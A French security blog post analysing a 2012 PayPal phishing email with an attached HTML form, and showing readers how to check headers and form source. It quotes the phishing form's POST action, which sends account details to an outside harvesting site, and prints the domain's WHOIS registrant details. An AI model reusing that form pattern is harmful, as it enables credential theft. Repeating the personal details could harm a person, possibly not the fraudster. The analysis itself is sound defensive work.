Phishing Paypal

Une page pour du Phishing Paypal un peu atypique.
Pour rappel le phishing est le principe qui consiste à se faire passer pour un organisme (Paypal, Banque, Hotmal etc ) en demandant des informations pour au final les récupérer. Le but est donc de voler des comptes.
Généralement cela se traduit par des mails avec des liens qui conduisent vers des formulaires, l’internaute saisi les informations et les pirates les récupèrent à l’autre bout.
Il faut regarder le domaine du site qui ne correspond pas au domaine des sites utilisés par ces organismes

Une page sur le forum consacré au phishing : http://forum.malekal.com/phishing-t623.html
Quelques exemples :

Aujourd’hui j’ai reçu celui-ci qui est passé à travers l’antispam.
En règle général, les anti-spam s’avère efficace mais ici contrairement aux autres phishing, il n’y pas de lien donné mais un fichier HTML attaché.
Cela semble être la dernière mode puisque des campagnes de SPAM malicieux utilisent ces méthodes avec notamment : Worm:Win32/Cridex/Trojan.Win32.Jorik.Totem : Campagne par mail

On peux avoir des fautes dans le mail dû à l’utilisation d’un traducteur automatique (les pirates étant étrangers).
Ici cela va, par contre, quelques erreurs de syntaxe (pas d’espace après la virgurle, espacement etc).

L’en-tête (header) du mail :

Received: from s15570402.onlinehome-server.info (HELO s15570402) (87.106.133.26)
by xxxxxxxx with SMTP; 24 Mar 2012 22:08:38 +0100
From: service@paypal.fr <service@paypal-in.fr>
To: xxx
Subject: Notification importante 
 

Le mail est donc envoyé depuis l’IP  87.106.133.26 qui est en Allemagne.
L’en-tête d’un vrai mail venant de Paypal donne :

Received: from mx3.slc.paypal.com (HELO mx0.slc.paypal.com) (173.0.84.228)
by xxxxxxxwith SMTP; 16 Mar 2012 09:22:42 +0100
 

La page HTML conduit au formulaire ci-dessous. Les informations récupérés permettant la connexion au compte Paypal par le pirate.

A noter que les images et autres sont bien chargés depuis paypal et notamment l’adresse : https://www.paypalobjects.com/

Pour savoir où vont les données, il faut éditer le code source (souvent dans le menu Affiche / Code source) ou via un clic droit et chercher method= »post »
Dans notre cas, on obtient :

<form method= »post » id= »signup_form » name= »signup_form » action= »http://www.allezdisccount.com/button/javascript/rib.php »>
 

Les données sont donc envoyées au site www.allezdisccount.com qui n’a rien à voir avec Paypal.
www.allezdisccount.com ayant l’adresse 67.228.184.52 qui appartient à SOFTLAYER-4-5
Le domaine allezdisccount.com donne :

REGISTRANT CONTACT INFO
none
cousin viviane
30 boulevard jean moulin apt335
Mareuil-sur-Cher
fr
41110
FR
Phone: +33.0642287146
Email Address: itoubmoussa@gmail.com

L’adresse semble ne pas exister.

 

Si d’habitude, le lien WEB donné dans le mail peut mettre la puce à l’oreille sur l’arnaque, ici pas de lien WEB.
On ne répètera jamais assez, les organismes ne demandent jamais d’informations par mail.
Ne divulger aucune information quelque soit la raison, à coup sûr, cela est une arnaque.

La détection du fichier HTML: https://www.virustotal.com/file/7d6b2a9e5511fe00bb1398743a7316517778bc435b3c3cf966a5926f0f9308e0/analysis/1332683129/

SHA256: 7d6b2a9e5511fe00bb1398743a7316517778bc435b3c3cf966a5926f0f9308e0
File name: redirect-www.paypal.fr-Informations Compte Paypal-5885d80a13c0.html
Detection ratio: 1 / 42
Analysis date: 2012-03-25 13:45:29 UTC ( 0 minute ago ) 
 
Sophos    Mal/Phish-A    20120325

 

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 231 times, 1 visits today)

One thought on “Phishing Paypal

  1. bonjour.
    Signaler nous vos phishing (courriers frauduleux ) a s.securite@orange.fr

    Nous transmettrons vos mails au services concernés ainsi qu’au éditeurs antivirus afin de rajouter les liens malveillants dans leurs bases de données afin de bloquer ses nuisances

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *